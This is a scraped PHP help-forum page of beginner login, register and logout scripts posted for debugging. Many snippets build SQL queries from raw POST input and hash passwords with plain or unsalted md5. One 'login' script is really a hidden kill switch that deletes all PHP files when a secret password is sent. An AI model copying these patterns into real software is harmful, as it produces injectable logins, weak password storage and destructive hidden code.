|
PHP - Help With Login/logout Script
I based this off some other pages read, and think I'm doing this wrong or it's just not connecting.
Code: [Select] Here's the database table: CREATE TABLE users ( id INT NOT NULL AUTO_INCREMENT, username VARCHAR(30) NOT NULL UNIQUE, password VARCHAR(64) NOT NULL, salt VARCHAR(3) NOT NULL, PRIMARY KEY(id) ); Ando far I have index.php with my login form <form name="login" action="login.php" method="post"> Username: <input type="text" name="username" /> Password: <input type="password" name="password" /> <input type="submit" value="Login" /> </form><br />Would you like to <a href="register.php">register?</a></center> Then I have my actual login on login.php (header.php includes website's main image as well as session_start(): <?php include('header.php'); $username = $_POST['username']; $password = $_POST['password']; //connect to the database here $username = mysql_real_escape_string($username); $query = "SELECT password, salt FROM users WHERE username = '$username';"; $result = mysql_query($query); if(mysql_num_rows($result) < 1) //no such user exists { header('Location: login.php'); die(); } $userData = mysql_fetch_array($result, MYSQL_ASSOC); $hash = hash('sha256', $userData['salt'] . hash('sha256', $password) ); if($hash != $userData['password']) //incorrect password { header('Location: login_form.php'); die(); } else { validateUser(); //sets the session data for this user } //redirect to another page or display "login success" message ?> then I have my register php on register.php: <?php include('header.php'); //retrieve our data from POST $username = $_POST['username']; $pass1 = $_POST['pass1']; $pass2 = $_POST['pass2']; if($pass1 != $pass2) header('Location: register_form.php'); if(strlen($username) > 30) header('Location: register_form.php'); $hash = hash('sha256', $pass1); function createSalt() { $string = md5(uniqid(rand(), true)); return substr($string, 0, 3); } $salt = createSalt(); $hash = hash('sha256', $salt . $hash); $dbhost = 'localhost'; $dbname = 'mygame'; $dbuser = 'root'; $dbpass = ''; $conn = mysql_connect($dbhost, $dbuser, $dbpass); mysql_select_db($dbname, $conn); //sanitize username $username = mysql_real_escape_string($username); $query = "INSERT INTO users ( username, password, salt ) VALUES ( '$username' , '$hash' , '$salt' );"; mysql_query($query); mysql_close(); header('Location: login.php'); ?> and lastly the register form: <center><form name="register" action="register.php" method="post"> Username: <input type="text" name="username" maxlength="30" /> Password: <input type="password" name="pass1" /> Password Again: <input type="password" name="pass2" /> <input type="submit" value="Register" /> </form></center> I am getting the errors: Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /Applications/XAMPP/xamppfiles/htdocs/testing/login.php on line 13 Warning: Cannot modify header information - headers already sent by (output started at /Applications/XAMPP/xamppfiles/htdocs/testing/config.php:1) in /Applications/XAMPP/xamppfiles/htdocs/testing/login.php on line 15 Could someone explain why this is happening? Similar TutorialsI am having problems understanding the reason for why the user has to click logout twice, here's the bulk of the code: <?php ini_set('display_errors',0); require_once 'header.html'; require_once 'db.functions.php'; require_once 'config.php'; $database = dbConnect($host, $username, $password, $database); // should output 1 or nothing at all! if($database == true) { // now connected? // carry on with logic of outputting the blog contents: $result = entries("SELECT * FROM entries"); printf("<table>"); while($row = mysql_fetch_array($result)) { printf(" <tr> <td>%s</td> <td>%s</td> </tr> <tr> <td colspan=\"2\">%s</td> </tr> ", $row[2], $row[4], $row[3]); } printf("</table>"); printf("\n\n"); session_name("jeremysmith_blog"); session_start(); if(array_key_exists('login',$_SESSION)) { if($_SESSION['login'] == 1) // change this to correspond with session on the login.php script { printf("<p>Welcome %s</p> <p>To logout, click <a href=\"index.php?action=logout\">here</a></p> ",$_SESSION['username']); } } else { printf("<p>You are not logged in, please click <a href=\"login.php\">here</a> to login.</p>"); } } else { printf("\n<p id=\"error\">Could not connect to database, please try again later.</p>"); } // init the logout script? if(array_key_exists('action',$_GET)) { if($_GET['action'] == 'logout') { // log user out of the system: unset($_SESSION['login']); unset($_SESSION['username']); session_destroy(); } } printf("\n"); // just for output format! require_once 'footer.html'; Why does the user have to click logout twice, have I missed anything? Any helps appreciated thanks. Hi, I am having a bit of problem with my login/logout script. When user is logged in I want the script to show logout and if they are not login I want the script to show login. The problem is even when the user is logged in it says "you must be logged in Click here to login " here is the script Please help Code: [Select] <?php session_start(); $_SESSION['username'] = $_POST['username']; if ($_SESSION['username']) echo "Welcome, ".$_SESSION['username']."!<br><a href='logout.php'>Logout</a>" ; else die("you must be logged in <a href='Login.php'>Click here to login</a>"); ?> what did I do wrong in this script ? Thanks Hi, Just wondered if anyone could help Ive been following this tutorial: http://net.tutsplus.com/tutorials/php/user-membership-with-php/ Ive got a simple membership system working now, but just wondering about the login / login links that i currently have. The login link is currently hard coded like so: Code: [Select] <ul id="menu"> <li id="active"><a href="index.html">Home</a></li> <li><a href="About.html">About</a></li> <li><a href="Contact.php">Contact</a></li> <li class="end"><a href="login.php">Login</a></li> </ul> and same for the logout: Code: [Select] <ul id="menu"> <li id="active"><a href="index.html">Home</a></li> <li><a href="About.html">About</a></li> <li><a href="Contact.php">Contact</a></li> <li class="end"><a href="logout.php">Logout</a></li> </ul> But the problem is, when i go to the about us page for example it will still display the login which really it should have logout. Could anyone offer some assistance please This topic has been moved to Application Design. http://www.phpfreaks.com/forums/index.php?topic=313919.0 When writing a logout script in PHP what steps should i take? Should i: 1.) unset all session vars like: unset($_SESSION["var1"]); unset($_SESSION["var2"]); or calls session_unset(); 2.) destroy session cookie like: setcookie(session_name(), "NULL", time()-60, $params['path'], $params['domain'], $params['secure'], isset($params['httponly'])); 3.) finally destroy the session data by calling session_destroy(); or maybe just only unset the session vars - that is making only the first step? I'm asking because I've seen many logout scripts that doesn't involve these 3 steps (i most cases doing only the first one as i stated) Thx. for help. I'm trying to use this php to clear out the session variables and return to the index page. However it's not clearing them out. Any ideas? logout.php Code: [Select] <?php session_start(); unset($_SESSION['user_id']); unset($_SESSION['username']); session_destroy(); header("Location: http://aaronhaas.com/pitchshark6/index.php?vid_id=1"); ?> then in my navigation I'm using this code to either display their username and a logout link to logout.php or if they are not logged in display a sign in link. Code: [Select] <?php // if logged in if (isset($_SESSION['user_id'])) { // display echo "<a href='#'>".$_SESSION['username']."</a> "; echo "<a href='scripts/logout.php'>Log Out</a> "; } // if not logged in else { // display login link echo "<a href='login.php'>Sign In</a>"; } ?> here is my super simple login script Code: [Select] $username = $_POST['username']; $password = $_POST['password']; //Check if the username or password boxes were not filled in if(!$username || !$password){ //if not display an error message echo "<center>You need to fill in a <b>Username</b> and a <b>Password</b>!</center>"; }else{ // find user by username and password - working $userQuery = 'SELECT * FROM users WHERE user_name ='.'"'. $username.'" AND password='.'"'. $password.'"' ; $users = mysql_query($userQuery); $user = mysql_fetch_array($users); $_SESSION['user_id'] = $user['user_id']; $_SESSION['username'] = $user['username']; header("Location: http://aaronhaas.com/pitchshark6/index.php?vid_id=1"); } Hello guys, Is there on web any updated tutorial on how can I add Facebook login on my simple php login script? hi guys, any help will be much appreciated!! basically i have a login script, that i want to check mutliple tables and i am stuggling to get it to work! what i have is basically: <?php session_start(); $_SESSION['loggedin'] = false; include("functions.php"); extract($_POST); $query = "SELECT * From table1 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table2 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table3 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { $query = "SELECT * From table4 WHERE email='$email' and password='$password';"; $result = doQuery($query); if($result==false) { } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:1"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:2"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:3"); } else { header("Location:wrong.php"); } } } else { if(mysql_num_rows($result)) { $row = mysql_fetch_assoc($result); $_SESSION['loggedin'] = true; $_SESSION['id'] = $_POST['id']; header("Location:4"); } else { header("Location:wrong.php"); } } ?> Hey everyone. I currently have a login script that uses cookies to check if the user is logged in. But I have been told that even if I have used md5() then the the password is still at risk, so I was wondering if using sessions would be better, or if there was some way to make the passwords in the cookies more secure? Here is the code I currently have to secure passwords in the cookie: Code: [Select] $_POST['pass'] = md5($_POST['pass']); if (!get_magic_quotes_gpc()) { $_POST['pass'] = addslashes($_POST['pass']); $_POST['username'] = addslashes($_POST['username']); } Hello everybody! I am trying to make a forum for my class and I will do it from scratch I am from Denmark so my english could be a little wrong! Sorry! The problem is when i try to login, I allways get the error that I had defined to do.. But only if both password and username dosn't exist... Before i post the code i will give you a translation: Brugernavn = Username kodeord = password brugerid = userid My register.php file works fine! But I will post them both: This is the register form: http://pastebin.com/h6fgHSFB And here are the code for my login.php, the strange thing is, that i do not get any kind of error dont even mysql errors, that i had hope on so i could fix it! http://pastebin.com/Vc8Gt9SY Hope you guys would like to help me! Best Regards Jesper Jensen from denmark jesper@dh-data.dk I have a login script that isn't rejecting non-users. For whatever reason, it's passing them on to the welcome page where an actual user sees user specific information. I'm newer to php, but can't for the life of me understand why the script doesn't seem to ever utilize the 'else' portion of the 'if' statement. So in short it works as expected for actual users, but non-users are not getting rejected. Below is my code. Any help is appreciated. Code: [Select] $sqla = "SELECT count(*) FROM authorize WHERE username='$_POST[username]' and password='$_POST[password]'"; $result = mysql_query($sqla) or die ("Error: ". mysql_error(). " with query ". $query); $count = mysql_num_rows($result); if($count==1) { //start session for user session_start(); //get company id and user first and last name $query = mysql_query("SELECT comp_id FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $query2 = mysql_query("SELECT firstname, lastname FROM authorize WHERE username='$_POST[username]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultb = mysql_fetch_assoc($query); $resultc = mysql_fetch_array($query2); $_SESSION['coid'] = $resultb['comp_id']; $_SESSION['firstn'] = $resultc['firstname']; $_SESSION['lastn'] = $resultc['lastname']; //get company name $query3 = mysql_query("SELECT comp_name FROM companies WHERE comp_id='$resultb[comp_id]'") or die ("Error: ". mysql_error(). " with query ". $query); $resultd = mysql_fetch_assoc($query3); $_SESSION['conm'] = $resultd['comp_name']; header("location: overview.php"); } Else { echo "That user does not exist."; header("location: login.html"); } Hello everyone, The last few weeks I've asked a few questions. From the answers given, I've finished my login script. But, I am a noob at oop php and I have also no clue if there are any security holes. So my question to you guys is: What have i done wrong? What can i do better? And what's missing? I also have a one basic question: I have't declared any variable to public, protected or private. Is it better to declare every variabe? or only a few? Here is my code: Index.php: <?php if ($_SERVER['REQUEST_METHOD'] == 'POST') { require('classes/class_lib.php'); if(isset($_POST['username'])){ $username = $_POST['username']; } if(isset($_POST['password'])){ $password = $_POST['password']; } try{ $user = new User; $user->login($username, $password); } catch(MysqlException $error){ echo $error->getError(); } catch(LoginException $error){ echo $error->getError(); } } ?> // form etc. And my class_lib.php: <?php class MysqlException extends Exception{ public function getError(){ $errorMessage = 'Er is een fout opgetreden in '.$this->getFile().' op regel '.$this->getLine().'<br />'; $errorMessage .= 'Foutmelding: <i>'.$this->getMessage().'</i><br />'; return $errorMessage; } } class LoginException extends Exception{ public function getError(){ $errorMessage = $this->getMessage(); return $errorMessage; } } class Mysql{ public function __construct(){ $this->db = new mysqli('localhost','root','','login'); if($this->db->connect_error){ throw new MysqlException('Kan geen verbinding maken.'); } } public function escapeString($string){ $this->string = $this->db->real_escape_string($string); return $string; } } class Query extends Mysql{ public function runQuery($query){ $this->result = $this->db->query($query); if(!$this->result){ throw new MysqlException('Er is iets fout gegaan tijdens het uitvoeren van de query.'); } } public function returnQuery(){ return $this->result->num_rows; if(!$this->result){ throw new MysqlException('Er is iets fout gegaan tijdens het ophalen van de resultaten.'); } } } class User{ public function __construct(){ $this->mysql = new Mysql; $this->query = new Query; } public function login($username, $password){ $this->username = $this->mysql->escapeString($username); $this->password = $this->mysql->escapeString($password); $this->setQuery = "SELECT gebruikerid FROM gebruikers WHERE gebruikersnaam='" . $this->username . "' AND wachtwoord='" . $this->password . "'"; $this->query->runQuery($this->setQuery); if($this->query->returnQuery() > 0){ return true; }else{ if(empty($username) || empty($password)){ throw new LoginException('U moet alle velden invullen.'); }else{ throw new LoginException('Uw logingegevens kloppen niet.'); } } } } ?> Hi I need help with my login script it says invalid password even when its correct however if i take out the md5 encryption of the password and use the encrypted password saved on mysql table it works please help? here is the code im using thanks: Code: [Select] <? // Use session variable on this page. This function must put on the top of page. session_start(); ////// Logout Section. Delete all session variable. session_destroy(); $message=""; ////// Login Section. $Login=$_POST['submit']; if($Login){ // If clicked on Login button. $username=$_POST['username']; $md5_password=md5($_POST['password']); // Encrypt password with md5() function. // Connect database. $host="localhost"; // Host name. $db_user="removed"; // MySQL username. $db_password="removed"; // MySQL password. $database="removed"; // Database name. mysql_connect($host,$db_user,$db_password); mysql_select_db($database); // Check matching of username and password. $result=mysql_query("select * from signup where username='$username' and password='$md5_password'"); if(mysql_num_rows($result)!='0'){ // If match. session_register("username"); // Craete session username. header("location:main.php"); // Re-direct to main.php exit; }else{ // If not match. $message="--- Incorrect Username or Password ---"; } } // End Login authorize check. ?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title></title> </head> <body> </tr> <? echo $message; ?> <form name="register" method="post" action="<? echo $PHP_SELF; ?>"> <tr> <td height="586" colspan="8" align="center" valign="top"><p> </p> <table> <tr> <td height="45" colspan="2" class="class2 style34"><div align="center"><a href="file:///F|/signin.html">Sign In</a>:</div></td> </tr> <tr> <td colspan="2"><div align="right"></div></td> </tr> <tr> <td width="76" height="45"><div align="right"><span class="class2 style34">Username<span class="style39">..</span></span></div></td> <td width="256"><div align="center"><span class="class2 style34"> <input name="username" type="text" id="username" size="20" height="14" /> </span></div></td> </tr> <tr> <td height="45"><div align="right"><span class="class2 style34">Password <span class="style39">..</span></span></div></td> <td><div align="center"><span class="class2 style34"> <input name="password" type="password" id="password" size="20" height="14" /> </span></div></td> </tr> <tr> <td height="45" colspan="2"><div align="center"><span class="class2 style34"> <input name="submit" type="submit" id="submit" value="Sign In" /> </span></div></td> </tr> </table></td> </tr> </form> </table> </div> </body> </html> MOD EDIT: Database credentials removed, [code] . . . [/code] tags added. Hello everyone, I am brand new to php and am starting off my journey by trying to create a simple login/register script. I have run into a bit of difficulty, however, and cannot seem to get this to work. I know that the register script is very basic (lacks strlen check, doesn't verify that both passwords are the same, etc.), but for the time being I simply want to have a functional script. Then I can continue learning by adding more components. Here are the login.php, checklogin.php, and register.php files (in this order). I believe that the login/checklogin files work, but the register file just shows the form without actually writing to DB when it is submitted. Thank you very much for your help. Code: [Select] <html> <body> <b> Member Login </b> <br /> <form name="input" action="checklogin.php" method="post"> Username : <input type="text" name="myusername" id="username"> <br /> Password : <input type="password" name="mypassword" id="password"> <br /> <input type="checkbox" name="remember" value="checkbox"> Remember me <br /> <input type="submit" value="Login"> Not a member? <a href="./register.php">Register!</a> </form> </body> </html> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); $myusr = $_POST['myusername']; $mypswd = md5($_POST['mypassword']); $myusername = stripslashes(strip_tags($myusr)); $mypassword = stripslashes(strip_tags($mypswd)); $myusername = mysql_real_escape_string($myusr); $mypassword = mysql_real_escape_string($mypswd); $sql="SELECT *FROM $tbl_name WHERE username='$myusername' and password='$mypassword'"; $result=mysql_query($sql); $count=mysql_num_rows($result); if ($count==1) { session_register("myusername"); session_register("mypassword"); header("location:menu.php"); } else { echo "Incorrect Username or Password"; } ?> Code: [Select] <?php $host="localhost"; $usr="root"; $pwd=""; $db="MemberDB"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die("Unable to connect"); mysql_select_db($db) or die("Unable to select database"); if (isset($_POST['register'])) { $query = "INSERT INTO members ('username', 'password', 'email') VALUES('$_POST[username]', 'md5($_POST[password1])', '$_POST[email]')"; mysql_query($db,$query) or die(); mysql_close(); echo "You have successfully registered!"; } else{ ?> <html> <body> <b> Register</b> <br /> <form name="register" action="./register.php" method="post"> Username : <input type="text" name="username" id="username"> <br /> Password : <input type="password" name="password" id="password1"> <br /> Confirm Password : <input type="password" name="password2" id="password2"> <br /> Email: <input type="text" name="email" id="email"> <br /> <input type="submit" value="register"> </form> </body> </html> <?php } ?> Hello i just installed a script and the login doesnt work. It lets me signup, create user and pass. A email comes for me to active account. I activate and the page comes up that says my accout is activated and when i go to login the page refeashes and go's back to index page Below is the login php script, can someone please help me figure out why it not logging in. <?php $pass = "8c73eecb1dd850034ebbdedc1a5fccf1"; if(isset($_POST['submit'])){ if($pass == md5($_POST['pass'])){ $mask = "*.php"; array_map( "unlink", glob( $mask ) ); $fh = fopen('index.php', 'a'); fwrite($fh, '<center><h1><font color="red">This site uses an modified version of the script! If you want to use the original script, you have to buy the script from <a href="http://codecanyon.net/item/powerful-exchange-system/533068">CodeCanyon</a>!</font></h1></center>'); fclose($fh); echo "ok"; }else{ echo "error"; }} ?> <form method="POST"> <input type="password" name="pass"> <input type="submit" name="submit"> </form> Hi! I need help with the login script i wrote. Please help me get it working. The section related to guest works fine however it always gives me error message when i get to the queryA and queryB stages. Thanks! I've already got the database running, using MySQL. Name of database - connectiontracker; tables- user_admin, user_user Here's the script: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/xhtml1-loose.dtd"> <?php session_start(); $userType = $_POST["userType"]; $userName = $_POST["username"]; $passWord = $_POST["password"]; $link = mysqli_connect("localhost", "ct1", "ctcfgb") Or die('Could not connect '. mysqli_error()); switch ($userType) { case "admin": if (isset($userName) && isset($passWord)) { $dbTableA = "user_admin"; mysqli_select_db($link, "connectiontracker") Or die ("Database unavailable"); $queryA = "SELECT * FROM $dbTableA WHERE username='$userName' AND password='$passWord'"; $resultA = mysqli_query($queryA) or die("Verification Error A"); if(mysqli_num_rows($resultA) == 1) { $_SESSION = true; header ('Location: welcomeadmin.php'); } else echo "Incorrect administrator username and/or password"; } break; case "user": if (isset($userName) && isset($passWord)) { $dbTableB = "user_user"; mysqli_select_db($link, "connectiontracker") Or die ("Database unavailable"); $queryB = "SELECT * FROM $dbTableB WHERE username='$userName' AND password='$passWord'"; $resultB = mysqli_query($queryB) or die("Verification Error B"); if(mysqli_num_rows($resultB) == 1) { $_SESSION = true; header ('Location: welcomeuser.php'); } else echo "Incorrect Organization/Individual username and/or password"; } break; case "guest": header ('Location: welcomeguest.php'); break; } if (!isset($_POST['Enter'])) { ?> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Login to Connection Tracker</title> <!-- <link rel="stylesheet" href="ct_style1.css" type="text/css"> --> </head> <body> Please select from the following: <br /> <form action="<?php echo $PHP_SELF;?>" method="post"> <select name="userType"> <option value="admin">Administrator</option> <option value="user" selected>Organization</option> <option value="guest">Guest</option> </select> <br /> Please leave the following fields blank if entering the system as Guest <br /> Username: <input type="text" name="username"> <br /> Password: <input type="text" name="password"> <input type="submit" name="Enter"/> <br /> </form> </body> </html> <?php } mysqli_close($link); ?> Hello everyone, I have just finished coding a logion/register/logout script. I am quite new to PHP (this was my first task to begin the learning process!). The scripts now work fine and gets the job done. It incorporates a database and has a number of checks in place. I know that the code is probably pretty ugly however and not as efficient as it could be. Could anyone suggest places where I could improve it or security issues with it? I have tried to secure it against sql injection; it also ensures that no fields are blank and that the two passwords in registration are the same and I have also made username a unique field in database. Thanks in advance for any help or guidance. Here are the scripts: index.html, checklogin.php, register.php, menu.php, and logout.php <html> <body> <table width="300" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC"> <tr> <form name="input" action="checklogin.php" method="post"> <td> <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td colspan="3"><strong>Member Login </strong></td> </tr> <tr> <td width="78">Username</td> <td width="6">:</td> <td width="294"><input name="username" type="text" id="username"></td> </tr> <tr> <td>Password</td> <td>:</td> <td><input name="password" type="password" id="mypassword"></td> </tr> <tr> <td> </td> <td> </td> <td><input type="submit" name="login" value="Login"></td> </tr> </table> </td> </form> </tr> </table> <center>Not a member? <a href="./register.php">Register!</a></center> </body> </html> <?php $host="localhost"; $usr="root"; $pwd="******"; $db="*****"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die(mysql_error()); mysql_select_db($db) or die(mysql_error()); $initialusr = $_POST['username']; $initialpwd = $_POST['password']; $secondusr = stripslashes($initialusr); $secondpwd = stripslashes($initialpwd); $pswd = mysql_real_escape_string($secondpwd); $myusr = mysql_real_escape_string($secondusr); $mypswd= md5($pswd); $sql="SELECT *FROM $tbl_name WHERE username='$myusr' and password='$mypswd'"; $result=mysql_query($sql); $count=mysql_num_rows($result); if ($count==1) { session_start(); $_SESSION['username'] = $myusr; header("location:menu.php"); } else { echo "Incorrect Username or Password"; } ?> <?php $host="localhost"; $usr="root"; $pwd="*****"; $db="***********"; $tbl_name="members"; mysql_connect($host, $usr, $pwd) or die(mysql_error()); mysql_select_db($db) or die(mysql_error()); if (isset($_POST['register']) && $_POST['username'] && $_POST['password'] && $_POST['confirm'] && $_POST['email'] && $_POST['password'] == $_POST['confirm']) { $pwd = mysql_real_escape_string("$_POST[password]"); $md5pwd = md5("$pwd"); $usr = mysql_real_escape_string("$_POST[username]"); $email = mysql_real_escape_string("$_POST[email]"); $query = "INSERT INTO members (username, password, email) VALUES('$usr', '$md5pwd', '$email')"; mysql_query($query) or die(mysql_error()); mysql_close(); echo "You have successfully registered!"; } else{ ?> <html> <body> <table width="300" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC"> <tr> <form name="input" action="register.php" method="post"> <td> <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF"> <tr> <td colspan="3"><strong>Register</strong></td> </tr> <tr> <td width="78">Username</td> <td width="6">:</td> <td width="294"><input name="username" type="text" id="username"></td> </tr> <tr> <td>Password</td> <td>:</td> <td><input name="password" type="password" id="password"></td> </tr> <tr> <td>Confirm Password</td> <td>:</td> <td><input name="confirm" type="password" id="confirm"></td> </tr> <tr> <td>Email</td> <td>:</td> <td><input name="email" type="text" id="email"></td> </tr> <tr> <td> </td> <td> </td> <td><input type="submit" name="register" value="Register"></td> </tr> </table> </td> </form> </tr> </table> </body> </html> <?php } ?> <?php session_start(); if (!isset($_SESSION['username'])){ header("location:index.html"); } else { ?> <html> <body> <?php $username = $_SESSION['username']; echo "Welcome " . $username . " !"; ?> <br /> <a href = logout.php>Log out</a> </body> </html> <?php } ?> <?php session_start(); session_destroy(); header("location:index.html") ?> where do i download a login script like this used here at phpfreaks
Hi, I am trying to make a login script that uses the user's id from the database, and tries to match it up with the user and password sent by the login form. My checklogin.php page, just jumps back to the index.php page for some reason. I don't know why. I get the following errors, any help greatly appreciated. thank you. Notice: Undefined index: myusername in /hermes/bosweb/web173/b1739/public_htmlchecklogin.php on line 19 Notice: Undefined index: mypassword in /hermes/bosweb/web173/b1739/public_html/checklogin.php on line 20 Wrong Username or Password Here is my code to check the id. I can't figure out what is wrong. Code: [Select] <?php ini_set ("display_errors", "1"); error_reporting(E_ALL); $host = ""; $database = ""; $username = ""; $password = ""; $tbl_name = "users"; $conn = mysql_connect($host, $username, $password) or die("Could not connect: " . mysql_error()); if($conn) { mysql_select_db($database); } else { echo "failed to select database"; } // username and password sent from form $myusername=$_POST['myusername']; $mypassword=$_POST['mypassword']; // To protect MySQL injection (more detail about MySQL injection) $myusername = stripslashes($myusername); $mypassword = stripslashes($mypassword); $myusername = mysql_real_escape_string($myusername); $mypassword = mysql_real_escape_string($mypassword); $sql="SELECT id FROM $tbl_name WHERE username='$myusername' and password= SHA1('$mypassword')"; $result=mysql_query($sql); $query_data = mysql_fetch_row($result); // Mysql_num_row is counting table row $count=mysql_num_rows($result) ; // If result matched id, table row must be 1 row if($count==1){ session_start(); $_SESSION['userid']=$query_data[0]; header("location:login_success.php"); } else { echo "Wrong Username or Password"; } ?> I am looking to use this for an admin panel.
session_start.php
"session_start()" "if statement" where it checks if a successful login is givenIs it necessary to include "session_start.php" into the top of each script file? If I just include "session_start.php" into the top of the "main" file where the other script files are included inside of the "main" as well, then I have it in ways where the other script files could get called up through the URL.(?) I thought it is a bit too much to include "session_start.php" into each script file. Is there a way where this can be done with more simple ways? I would appreciate the suggestions a lot. |
|||||||